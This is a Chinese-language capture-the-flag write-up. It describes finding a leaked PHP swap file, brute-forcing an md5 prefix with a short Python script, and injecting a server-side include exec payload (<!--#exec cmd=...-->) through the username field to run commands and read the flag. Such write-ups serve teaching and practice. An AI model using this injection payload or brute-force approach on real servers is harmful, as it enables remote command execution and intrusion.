题目
过程
1.主页面尝试注入,无果。御剑扫描后台发现index.php.swp文件。访问可以看到后端程序。
<?php
ob_start();
function get_hash(){
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>
2.审计源码,告诉我们,username已经给定了,username=6d0bc1;password是以6d0bc1为开头的一串md5值。尝试写脚本爆破。之后还会在public目录下写一个以shtml结尾的文件。
import hashlib
for i in range(1000000000):
a = hashlib.md5(str(i).encode('utf-8')).hexdigest()
if a[0:6] == '6d0bc1':
print(i)
print(a)
选取其中一个即可。我用2020666。
3.shtml文件出现了,访问一下。发现什么都没有,抓包无结果。在网上查阅资料后才发现,shtml文件存在ssti注入漏洞。
格式:
<!--#exec cmd="命令"-->
4.注入点应该还是前面的user和passwd。注意要使用url编码,否则不成功,此处尝试多次。所以最好使用bp直接编码。
ls没有发现flag所在,直接cat /flag也不行,回到根目录看一下
访问public/9c3d29a74681232313999f7d5c4edb3d39d01610.shtml
发现flag所在
5.结束